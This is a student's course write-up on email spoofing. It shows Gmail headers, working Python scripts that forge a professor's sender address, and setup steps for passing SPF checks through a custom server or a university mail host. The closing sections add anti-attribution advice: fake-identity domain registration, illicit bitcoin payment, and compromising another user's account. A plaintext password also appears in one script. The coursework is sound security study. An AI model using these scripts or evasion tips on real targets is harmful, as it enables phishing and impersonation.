# CS2107 Assignment 1

## Introduction

Author: Jeremy Heng Wen Ming (A0146789H)

Date: Wednesday, 10 Feb 2016


## Email Spoofing Attacks

For this segment, I will demonstrate the end result of performing the email
spoofing attack on my own test Google mail account (jeremycs2107@gmail.com). I
will introduce four levels of forgery and their impact on *detectability* and
*tracebility*. These levels are:

1. Local SMTP Server with Softfail SPF
2. Gmail SMTP Server with Softfail SPF
3. Remote SMTP Server with Passing SPF (SPF Record Set)
4. Remote SMTP Server with Passing SPF with Social Engineering Approach

### Local SMTP Server with Softfail SPF

In this scenario, the email is sent using a local SMTP server with the following
delivery headers:

```console
Delivered-To: jeremycs2107@gmail.com
Received: by 10.202.0.8 with SMTP id 8csp2234241oia;
        Tue, 9 Feb 2016 10:21:37 -0800 (PST)
X-Received: by 10.50.25.167 with SMTP id d7mr5877379igg.69.1455042097202;
        Tue, 09 Feb 2016 10:21:37 -0800 (PST)
Return-Path: <jeremycs2107@gmail.com>
Received: from vagrant-ubuntu-trusty-64 ([58.182.93.38])
        by mx.google.com with ESMTP id k42si53575023iod.203.2016.02.09.10.21.36
        for <jeremycs2107@gmail.com>;
        Tue, 09 Feb 2016 10:21:37 -0800 (PST)
Received-SPF: softfail (google.com: domain of transitioning
        jeremycs2107@gmail.com does not designate 58.182.93.38 as permitted
        sender) client-ip=58.182.93.38;
Authentication-Results: mx.google.com;
       spf=softfail (google.com: domain of transitioning jeremycs2107@gmail.com
       does not designate 58.182.93.38 as permitted sender)
       smtp.mailfrom=jeremycs2107@gmail.com;
       dmarc=fail (p=NONE dis=NONE) header.from=gmail.com
Received: from [10.0.2.15] (localhost [127.0.0.1])
    by vagrant-ubuntu-trusty-64 (Postfix) with ESMTP id B4B6C41296
    for <jeremycs2107@gmail.com>; Tue,  9 Feb 2016 18:21:35 +0000 (UTC)
```

Important items to notice in the above are:

1. `vagrant-ubuntu-trusty-64` - This hostname is not a valid domain name and
   hence, the Sender Policy Framework (SPF) authentication fails and the
   reputability of the sending SMTP server cannot be established.
2. `softfail` (google.com...) - This means that the email origin cannot be
   verified since the origin of the email (my home IP address `58.182.93.38`) is
   not a permitted sender in the SPF entry in Google's DNS.

This mail gets sent straight to the spam folder in Gmail. This is because the
sender is completely untrusted and is unreputable without a reverse DNS PTR
entry and an SPF entry. In Figure 1, we can see that the email appears in the
spam category instead of the inbox.

![Spoofing with a local server goes to spam][local1]

Also, Google flags the mail as a phishing attempt and lets the owner of the
email account know with an extremely obvious notification (Figure 2).

![Gmail flags the email as a phishing attempting][local2]

The entire original email message source is in Figure 3.

![Original untrusted message][local3]

#### Results

This method is extremely detectable since the email gets sent to spam and a
notification is displayed to warn the user. The traceability depends on the
skill of the attacker to hide their tracks. It becomes very difficult to
determine the identity of the attacker since no information besides the IP
address of the sending SMTP server is provided to the receiving SMTP server.

\pagebreak

### Gmail SMTP Server with Softfail SPF

In this scenario, we attempt to spoof a self-sent email from jergorn93@gmail.com
to jergorn93@gmail.com using the Google mail server with the account
jeremycs2107@gmail.com. This is to demonstrate that Google enforces user access
controls to prevent easy forgeries. (See the next section for script and details
on how the attack was implemented)

The headers are as follows:

```console
Delivered-To: jergorn93@gmail.com
Received: by 10.37.39.65 with SMTP id n62csp120170ybn;
        Thu, 11 Feb 2016 02:02:43 -0800 (PST)
X-Received: by 10.98.70.80 with SMTP id t77mr65001917pfa.107.1455184963295;
        Thu, 11 Feb 2016 02:02:43 -0800 (PST)
Return-Path: <jeremycs2107@gmail.com>
Received: from mail-pa0-x231.google.com (mail-pa0-x231.google.com. [2607:f8b0:400e:c03::231])
        by mx.google.com with ESMTPS id xu3si10461704pab.94.2016.02.11.02.02.43
        for <jergorn93@gmail.com>
        (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
        Thu, 11 Feb 2016 02:02:43 -0800 (PST)
Received-SPF: pass (google.com: domain of jeremycs2107@gmail.com designates
        2607:f8b0:400e:c03::231 as permitted sender) client-ip=2607:f8b0:400e:c03::231;
Authentication-Results: mx.google.com;
       spf=pass (google.com: domain of jeremycs2107@gmail.com designates
       2607:f8b0:400e:c03::231 as permitted sender) smtp.mailfrom=jeremycs2107@gmail.com;
       dkim=pass header.i=@gmail.com;
       dmarc=pass (p=NONE dis=NONE) header.from=gmail.com
Received: by mail-pa0-x231.google.com with SMTP id ho8so24288612pac.2
        for <jergorn93@gmail.com>; Thu, 11 Feb 2016 02:02:43 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=20120113;
        h=message-id:date:from:content-type:mime-version:subject:to;
        bh=pxJGtz5XWvj4Fr+U717WyKF0PRj6CcQTE4WOroE8unA=;
        b=wH4fyKfpkEWiZFblosw1KUmNZ0sx1O8TrPDUJ3V+tK+rd7+juNAn824yI5I0n5SWsM
         jYTNhb/YNQugwF6hKYOVQktL8KWj68qT6xa51qj0JiEMIORZTLRbdI7NrcTxJeYyiTPB
         l+CfeimeSVTOJlnoLILLENnQULWxtppkSekd/sQAe7M5J72S3G9quISlq7mEMU0tCgqc
         sR9etq/GEB7TXJTBqXdaN4fgiqBme2bKIN5x9kNVLrVswB6vn7LXO5FrdZFzluY/SjJW
         Nf4rz4rc+MKWFXtxBgfOwt4WxNG23nSG8KETgULWGEjuxH4AEfyfux/3cLOrCFugz8m7
         9/FQ==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20130820;
        h=x-gm-message-state:message-id:date:from:content-type:mime-version
         :subject:to;
        bh=pxJGtz5XWvj4Fr+U717WyKF0PRj6CcQTE4WOroE8unA=;
        b=AyrmULh+UsE6Tp8lQ3lZ86W5XSKiyS0KrNikE3nYIJxDeNedUT/+Tp/rH0jUgD/GIK
         WhI0S5HqVPwcoDp28QDp/GyIFSoW6LrBzRU+ZJZcZxiR1DxZetRd/LJKBoKIaD/xIm4P
         eyDy1/n+fom+W8tOqaudvn4rFnugSvJXiBJt1iLaWOa1nnm3KndYqftarr7TIWTTFV+c
         +9oK6cs5B+TJwIpi5WFrkhasi64vSQIxDhuD9JqtXRpD81s7Yk73Ni1pH2O8XVCwZlyM
         hnkoqCKE1hyYHKwtlwRk0NSjO+v7pjenm4Zey1cdsBbNV16ox8kUExYscp9En7x0LOCi
         GyoA==
X-Gm-Message-State: AG10YOTjolCTYaTiNeDiCwCzowYKi7V2Oq47OGXxSuDNFQIrXqFpaikD1s6rwHiJDdvqGA==
X-Received: by 10.66.141.229 with SMTP id rr5mr66004105pab.123.1455184963054;
        Thu, 11 Feb 2016 02:02:43 -0800 (PST)
Return-Path: <jeremycs2107@gmail.com>
Received: from mx.codesinverse.com (mx.codesinverse.com. [128.199.67.116])
        by smtp.gmail.com with ESMTPSA id h66sm11029650pfd.91.2016.02.11.02.02.41
        for <jergorn93@gmail.com>
        (version=TLSv1/SSLv3 cipher=OTHER);
        Thu, 11 Feb 2016 02:02:42 -0800 (PST)
Message-ID: <56bc5c42.c542620a.379b5.7353@mx.google.com>
Date: Thu, 11 Feb 2016 02:02:42 -0800 (PST)
From: jeremycs2107@gmail.com
X-Google-Original-From: jergorn93@gmail.com
```

There are a couple of important things to note when executing the attack:

1. The sending email account has to allow less secure apps to access your
   account. This is required because the approved apps that Gmail allows by
   default does not allow for the forging of certain fields. The security level
   may be lowered through this link:
   http://www.google.com/settings/security/lesssecureapps.
2. `Received-SPF: pass (google.com` - SPF completely passes because the valid
   Google mail server is the sender.
3. `Return-Path: <jeremycs2107@gmail.com>` and `From: jeremycs2107@gmail.com`
   have been re-written from jergorn93@gmail.com to jeremycs2107@gmail.com by
   Google's SMTP servers.
4. `X-Google-Original-From: jergorn93@gmail.com` - This header preserves the
   original `From:` fields and serves to inform the end user of the original
   intentions of the sender.

The email goes to the target's inbox but the spoof attempt does not work,
revealing the true sender of the email. Figure 4 illustrates this.

![True senders revealed][gmail1]

#### Results

This method does not even successfully spoof the email and hence detectability
is irrelevant. The email source can be easily traced since the sender addresses
are overwritten.

\pagebreak

### Remote SMTP Server with Passing SPF (SPF Record Set)

Before we establish the exact headers to be received, we have to discuss the
parameters involved. We will use `mx.codesinverse.com` with a valid SPF entry
set as well as reverse DNS set up on the host. We can verify this by using
online SPF verification tools (Figure 5) as well as dig (Figure 6).

![Online verification tool for SPF][spf1]

![Dig DNS lookup for TXT entries][spf2]

\pagebreak

The headers for the received message are:

```console
Delivered-To: jeremycs2107@gmail.com
Received: by 10.202.46.84 with SMTP id u81csp110767oiu;
        Thu, 11 Feb 2016 01:11:35 -0800 (PST)
X-Received: by 10.98.16.198 with SMTP id 67mr35225142pfq.21.1455181895157;
        Thu, 11 Feb 2016 01:11:35 -0800 (PST)
Return-Path: <>
Received: from mx.codesinverse.com (mx.codesinverse.com. [128.199.67.116])
        by mx.google.com with ESMTP id c4si11397922pfj.47.2016.02.11.01.11.34
        for <jeremycs2107@gmail.com>;
        Thu, 11 Feb 2016 01:11:35 -0800 (PST)
Received-SPF: pass (google.com: domain of postmaster@mx.codesinverse.com
        designates 128.199.67.116 as permitted sender) client-ip=128.199.67.116;
Authentication-Results: mx.google.com;
       spf=pass (google.com: domain of postmaster@mx.codesinverse.com
       designates 128.199.67.116 as permitted sender) smtp.mailfrom=;
       dmarc=fail (p=NONE dis=NONE) header.from=gmail.com
Received: from mx.codesinverse.com (localhost [127.0.0.1])
    by mx.codesinverse.com (Postfix) with ESMTP id 3E7F763B90
    for <jeremycs2107@gmail.com>; Thu, 11 Feb 2016 04:11:29 -0500 (EST)
```

Headers to focus on are:

1. `Return-Path: <>` - SPF selects the sending SMTP server to verify by looking
   at the `Return-Path`. In this scenario, I have left the entry empty which
   means the server to be validated is by default the sender i.e.
   `mx.codesinverse.com`.
2. `Received-SPF: pass...` - As we have shown previously in figure 5,
   `mx.codesinverse.com` has a properly set SPF policy.

The result of this is that the email goes into the Inbox with all the
appearances of a legitimate message (Figure 7).

![Email goes into the Inbox][spf3]

If we look at email, we can see that there is no phishing notification to raise
suspicions of a spoofed email. However, there exists a `via mx.codesinverse.com`
field right next to the sender name. If the domain is one that would raise
alarms, this could increase the detectability of the attack. Figure 8
illustrates this.

![No phishing notification is shown][spf4]

The complete original message is shown in figure 9.

![SPF passed original message][spf5]

#### Results

This method does very well to escape detectability by landing the email in the
Inbox and not displaying a phishing notification. However, the fact that a `via`
message is added might increase suspicion if the attacker is not careful to
craft an unsuspicious domain. Traceability is markedly higher since a domain
name has to be registered and can provide a lead on the identity of the
attacker.

\pagebreak

### Remote SMTP Server with Passing SPF with Social Engineering Approach

Bearing the implications to traceability in mind, an attacker can do better by
designing better domains. For example, I could have set up `gmmail.com` as the
mail server and the message would have said `via gmmail.com` but it still would
not have prevented an attentive user from looking up the registration
information of the domain. We can design an attack scenario that goes one step
further: if we can compromise a host that the target trusts and either install
or use the local SMTP server, we can coerce the `via` field to display a more
believable domain.

In this scenario, the Professor is from NUS and we can leverage this knowledge
to craft our illusion. Since the attacker is also from NUS and is a student, it
would not be inaccurate to assume that they have access to the Sunfire Unix
server. Incidentally, the Sunfire server runs an SMTP server that can be
accessed by local users. Thus, an attacker can repeat the attack used in the
previous section to trick the Professor into overlooking the `via` field since
it comes from a perfectly plausible domain.

Launching the attack yields the following original message headers:

```console
Delivered-To: jeremycs2107@gmail.com
Received: by 10.202.46.84 with SMTP id u81csp224855oiu;
        Thu, 11 Feb 2016 05:23:39 -0800 (PST)
X-Received: by 10.129.114.139 with SMTP id n133mr26102726ywc.84.1455197019438;
        Thu, 11 Feb 2016 05:23:39 -0800 (PST)
Return-Path: <>
Received: from postfix1.comp.nus.edu.sg (84-21.comp.nus.edu.sg. [137.132.84.21])
        by mx.google.com with ESMTP id b63si3397026ywa.376.2016.02.11.05.23.38
        for <jeremycs2107@gmail.com>;
        Thu, 11 Feb 2016 05:23:39 -0800 (PST)
Received-SPF: pass (google.com: best guess record for domain of
        postmaster@postfix1.comp.nus.edu.sg designates 137.132.84.21 as permitted
        sender) client-ip=137.132.84.21;
Authentication-Results: mx.google.com;
       spf=pass (google.com: best guess record for domain of
       postmaster@postfix1.comp.nus.edu.sg designates 137.132.84.21 as permitted
       sender) smtp.mailfrom=;
       dmarc=fail (p=NONE dis=NONE) header.from=gmail.com
Received: from localhost (avs1.comp.nus.edu.sg [192.168.20.54])
    by postfix1.comp.nus.edu.sg (Postfix) with ESMTP id 5722F17B28
    for <jeremycs2107@gmail.com>; Thu, 11 Feb 2016 21:23:38 +0800 (SGT)
X-Virus-Scanned: amavisd-new at comp.nus.edu.sg
Received: from postfix1.comp.nus.edu.sg ([192.168.21.75])
    by localhost (avs1.comp.nus.edu.sg [192.168.20.54]) (amavisd-new, port 10024)
    with ESMTP id Qc0R-ZuB4EOz for <jeremycs2107@gmail.com>;
    Thu, 11 Feb 2016 21:23:36 +0800 (SGT)
Received: from sunfire0.comp.nus.edu.sg (sunfire0.comp.nus.edu.sg [192.168.20.85])
    by postfix1.comp.nus.edu.sg (Postfix) with ESMTP
    for <jeremycs2107@gmail.com>; Thu, 11 Feb 2016 21:23:36 +0800 (SGT)
Received: from sunfire0.comp.nus.edu.sg (localhost [127.0.0.1])
    by sunfire0.comp.nus.edu.sg (Postfix) with ESMTP id 9A26F23677
    for <jeremycs2107@gmail.com>; Thu, 11 Feb 2016 21:23:36 +0800 (SGT)
```

There is one interesting header that differs from the previous attack:

1. `Received-SPF: pass (google.com: best guess record...` - Instead of the
   previous explicitly designated sender, this SPF check uses `best guess
   record` which means that the default policy used is `v=spf1 a/24 mx/24 ptr
   ?all` which means that as long as the IP address originates from within those
   ranges, the SPF passes.

The default policy is used because there is no SPF record entered in the DNS
records for the domain. We can verify this by doing an SPF check using online
tools (Figure 10).

![No SPF entries for Sunfire][sunf1]

When we perform the attack and check our inbox, we see that the message gets
delivered successfully and looks legitimate (Figure 11).

![Inbox looks legitimate][sunf2]

If we open the email, nothing looks particularly amiss (Figure 12) and the
illusion of legitimacy is unbroken.

![Email looks extremely legitimate][sunf3]

The entire original message content can be seen in Figure 13.

![Sunfire sent original message][sunf4]

#### Results

The detectability of the email is extremely low with the email being sent
through a reputable and plausible SMTP server. However, the sender of the email
can be traced if the admins of the Sunfire server analysed the mail spool logs
and identify the user account that sent the email. This can be bypassed by
compromising another user account on the server and sending the email from that
account.

\pagebreak

### Preliminary Conclusions

From our experiments as described, we can identify three actions Google takes to
protect their end-users:

1. SMTP Server Reputability
2. Return Address SPF Verification
3. Origin Address Rewriting
4. External Mail Service Detection

#### SMTP Server Reputability

This determines whether an SMTP server identified by IP address is permitted to
send on behalf of a domain name. Practically, Gmail places incoming emails into
spam if SPF verification fails so ensuring that this passes is the first step to
successfully spoofing the email. In addition, the server also has to comply to
anti-spam standards such as providing a reverse PTR entry.

#### Return Address SPF Verification

If Gmail has determined the sending SMTP server to be 'reputable' by verifying
SPF, it goes on to check that the `Return-Path` domain permits the sending SMTP
server to send on behalf of that domain. If Gmail reports a softfail status for
SPF, it will display a phishing notification reporting that the message might
not have been sent by the address shown on the email.

#### Origin Address Rewriting

If Gmail's mail servers are used to send the spoofed email, the `From:` and
`Return-Path` addresses are rewritten to properly display the correct sender.
Gmail is able to do this as a login is required over SSL before it allows an app
to send emails.

#### External Mail Service Detection

Email messages can be sent legitimately with a valid Gmail `From:` header and an
empty `Return-Path:` header at the cost of having a `via` beside the sender
address when a user opens the email. This is unavoidable without the ability to
spoof DKIM signatures signed by Google. There are attacks on DKIM parsing but it
is uncertain that Gmail is vulnerable.

In conclusion, the best we can do is to:

1. Get the email into the target's inbox.
2. Prevent the phishing notification from being shown.
3. Manipulate the `via` address in such a way that the target accepts the email
   without suspicion.

## Attack Details

I will describe the steps and provide the scripts I used to execute the attacks
presented in the previous section.

### Local SMTP Server with Softfail SPF

To carry out this attack, I set up an Ubuntu 14.04 environment on Vagrant and
prepared the following python script:

```python
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

you = "jeremycs2107@gmail.com"
me = you

msg = MIMEMultipart('alternative')

fhash = "9113da1b61a4999f144088c6fd4e91df"
textdata = "assignment1 10\njeremy_heng_wen_ming_A0146789H.pdf\n%s" % fhash
htmldata = ('<div dir="ltr"><div>assignment1 10</div><div>' +
            'jeremy_heng_wen_ming_A0146789H.pdf</div>%s<br></div>' % fhash)

part1 = MIMEText(textdata, 'text')
part2 = MIMEText(htmldata, 'html')

msg.attach(part1)
msg.attach(part2)
msg['Subject'] = 'jeremy heng wen ming A0146789H'
namefrom = "Professor Jones <%s>" % you
msg['From'] = namefrom
msg['To'] = namefrom

s = smtplib.SMTP('localhost')
s.sendmail(me, [you], msg.as_string())
s.quit()
```

Once I had working environment, I took the following steps:

1. Install Postfix and configure it to deliver emails to the Internet.
2. Run the attack script.

### Gmail SMTP Server with Softfail SPF

To execute this attack, I used the following script. Since the attack uses
Google's own SMTP servers to deliver the emails, the only requirement is for
Python to be present on the system.

```python
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

me = "jeremycs2107@gmail.com"
you = "jergorn93@gmail.com"

msg = MIMEMultipart('alternative')

fhash = "9113da1b61a4999f144088c6fd4e91df"
textdata = "assignment1 10\njeremy_heng_wen_ming_A0146789H.pdf\n%s" % fhash
htmldata = ('<div dir="ltr"><div>assignment1 10</div><div>' +
            'jeremy_heng_wen_ming_A0146789H.pdf</div>%s<br></div>' % fhash)

part1 = MIMEText(textdata, 'text')
part2 = MIMEText(htmldata, 'html')

msg.attach(part1)
msg.attach(part2)
msg['Subject'] = 'jeremy heng wen ming A0146789H'
namefrom = "Professor Jones <%s>" % you
msg['From'] = namefrom
msg['To'] = namefrom

s = smtplib.SMTP_SSL('smtp.gmail.com', 465)
s.login(me, "cs2107cs2107")
s.sendmail(me, [you], msg.as_string())
s.quit()
```

Steps:

1. Run the attack script.

### Remote SMTP Server with Passing SPF (SPF Record Set)

This attack took effort to set up. It requires the following resources:

1. A domain name and control over the DNS records.
2. A server with Internet connectivity and root privileges.
3. The ability to set up reverse DNS PTR records for the IP address of the
   server

The attack script used in this scenario is:

```python
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

you = "jeremycs2107@gmail.com"
me = you

msg = MIMEMultipart('alternative')

fhash = "9113da1b61a4999f144088c6fd4e91df"
textdata = "assignment1 10\njeremy_heng_wen_ming_A0146789H.pdf\n%s" % fhash
htmldata = ('<div dir="ltr"><div>assignment1 10</div><div>' +
            'jeremy_heng_wen_ming_A0146789H.pdf</div>%s<br></div>' % fhash)

part1 = MIMEText(textdata, 'text')
part2 = MIMEText(htmldata, 'html')

msg.attach(part1)
msg.attach(part2)
msg['Subject'] = 'jeremy heng wen ming A0146789H'
namefrom = "Professor Jones <%s>" % you
msg['From'] = namefrom
msg['To'] = namefrom

s = smtplib.SMTP('mx.codesinverse.com')
s.sendmail("", [you], msg.as_string())
s.quit()
```

The steps to execute this attack:

1. Add the MX record for `mx.codesinverse.com` to specify the server that
   handles emails for the domain `codesinverse.com` (Figure 14)
2. Add the SPF records (TXT records) for `mx.codesinverse.com` (Figure 15).
   Notice the DKIM key included. We will discuss more on this in the 'Overall
   Strategy' section of this paper.
3. Provision a DigitalOcean droplet to host an Ubuntu 14.04 environment.
4. Install Postfix on the droplet and configure it to use the hostname
   `mx.codesinverse.com`.
5. Run the attack script on the server.

![Setting MX records][dns1]

![Setting TXT/SPF records][dns2]

![Postfix server running][dns3]

### Remote SMTP Server with Passing SPF with Social Engineering Approach

In this scenario, we require access to a Sunfire account. I used my personal
account to perform the attack (Figure 17). Since the environment is already
present and provided by Sunfire, this attack is markedly easier to launch than
the previous one.

The attack script:

```python
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

you = "jeremycs2107@gmail.com"
me = you

msg = MIMEMultipart('alternative')

fhash = "9113da1b61a4999f144088c6fd4e91df"
textdata = "assignment1 10\njeremy_heng_wen_ming_A0146789H.pdf\n%s" % fhash
htmldata = ('<div dir="ltr"><div>assignment1 10</div><div>' +
            'jeremy_heng_wen_ming_A0146789H.pdf</div>%s<br></div>' % fhash)

part1 = MIMEText(textdata, 'text')
part2 = MIMEText(htmldata, 'html')

msg.attach(part1)
msg.attach(part2)
msg['Subject'] = 'jeremy heng wen ming A0146789H'
namefrom = "Professor Jones <%s>" % you
msg['From'] = namefrom
msg['To'] = namefrom

s = smtplib.SMTP('localhost')
s.sendmail("", [you], msg.as_string())
s.quit()
```

Steps:

1. Run the attack script.

![Running the attack script on Sunfire][comp1]

## Overall Strategy

For this section, I will discuss only attack scenarios 3 and 4 since these two
are the ones that plausibly work.

### Common Strategies

It does not take much effort to notice that the attack scripts for scenario 3
and 4 are not very different. The only difference is that the SMTP servers used
are different.

First, we need to fulfil the impersonation requirement. We achieved this by
replacing the `From` and `To` headers with these lines:

```python
namefrom = "Professor Jones <%s>" % you
msg['From'] = namefrom
msg['To'] = namefrom
```

This completely mimics the original fields given in the picture. We also mimic
the format of the submission exactly with with the style of the writing as well
as the alternative multipart message of the original email.

```python
msg = MIMEMultipart('alternative')

fhash = "9113da1b61a4999f144088c6fd4e91df"
textdata = "assignment1 10\njeremy_heng_wen_ming_A0146789H.pdf\n%s" % fhash
htmldata = ('<div dir="ltr"><div>assignment1 10</div><div>' +
            'jeremy_heng_wen_ming_A0146789H.pdf</div>%s<br></div>' % fhash)

part1 = MIMEText(textdata, 'text')
part2 = MIMEText(htmldata, 'html')

msg.attach(part1)
msg.attach(part2)
msg['Subject'] = 'jeremy heng wen ming A0146789H'
```

Finally, we leave out `Return-Path` field (as opposed to setting it to the
Professor's email) to prevent the SPF check from failing.

```python
s.sendmail("", [you], msg.as_string())
```

### Remote SMTP Server with Passing SPF (SPF Record Set)

The feature that sets this apart from scenario 4 is the amount of customisabilty
an attacker has when he or she is able to control DNS records. To improve the
detectability avoidance metric, I could choose inconspicous domain names such as
`gmmail.com` in order to trick the victim into believing that the email came
from a legitimate mail server when they spot the `via` field.

Setting a proper SPF policy is important since it is the deterimining factor in
whether the email gets sent to the spam folder. A proper SPF entry affects the
reputability of the server and increases the chance of the spoof attack
succeeding.

To improve the traceability avoidance metric, I could register for the domain
name under a fake identity and pay for it with difficult-to-trace means such as
prepaid credit cards or illicitly obtained bitcoins. This would prevent the
Professor from obtaining concrete proof of the identity of the spoofer.

Additionally, there exist DKIM parsing vulnerabilities in some SMTP servers that
allow one to sign an email with DKIM and trick the server into believing that
the email comes from a trusted source thus removing the `via` field completely.
It is uncertain if Google mail is vulnerable to this vector.

### Remote SMTP Server with Passing SPF with Social Engineering Approach

The NUS domain name lends a great measure of credibility to the spoofed email.
Interestingly, the attack works because the `Return-Path` was left empty and
the SPF check was passed because of the 'best guess record' policy where the
default SPF policy permits any IP within the range allocated to NUS to send
emails. I hypothesise that if an SMTP server with an outward facing IP within
the block allocated to IP was set up, the SPF would also pass even though it is
not an official NUS mail server because of this lack of SPF entry. This would
improve the detectability and traceability avoidance metrics for the vector.

In our scenario, however, we used the Sunfire server to perform the attack. This
ties the attack to my account if the spoofed emails should ever be investigated.
The sent emails might have generated log entries that could betray my identity
if futher analysis was undertaken. I can mitigate this attribution process by
compromising another account on the Sunfire, sending the emails, and covering my
tracks.

### Conclusions

In conclusion, I believe the fourth scenario has the best potential to succeed
in the spoofing attack since the base amount of effort to perform the attack is
low, use of the NUS name can lower suspicions, and there exists multiple avenues
of reducing the level of traceability. However, if such a resource is
unavailable to an attacker (perhaps the attacker is not from NUS or the SMTP
server is locked down and requires authentication), a custom mail server can be
set up and can be made reputable by properly configuring SPF entries on DNS as
well as configuring reverse DNS PTR entries for the hosting server. Some measure
of creativity is required to trick the user into a false sense of security.

[//]: # (Images)
[local1]: images/1-1.png
[local2]: images/1-2.png
[local3]: images/1-3.png
[gmail1]: images/2-1.png
[spf1]: images/3-1.png
[spf2]: images/3-2.png
[spf3]: images/3-3.png
[spf4]: images/3-4.png
[spf5]: images/3-5.png
[sunf1]: images/4-1.png
[sunf2]: images/4-2.png
[sunf3]: images/4-3.png
[sunf4]: images/4-4.png
[dns1]: images/5-1.png
[dns2]: images/5-2.png
[dns3]: images/5-3.png
[comp1]: images/6-1.png
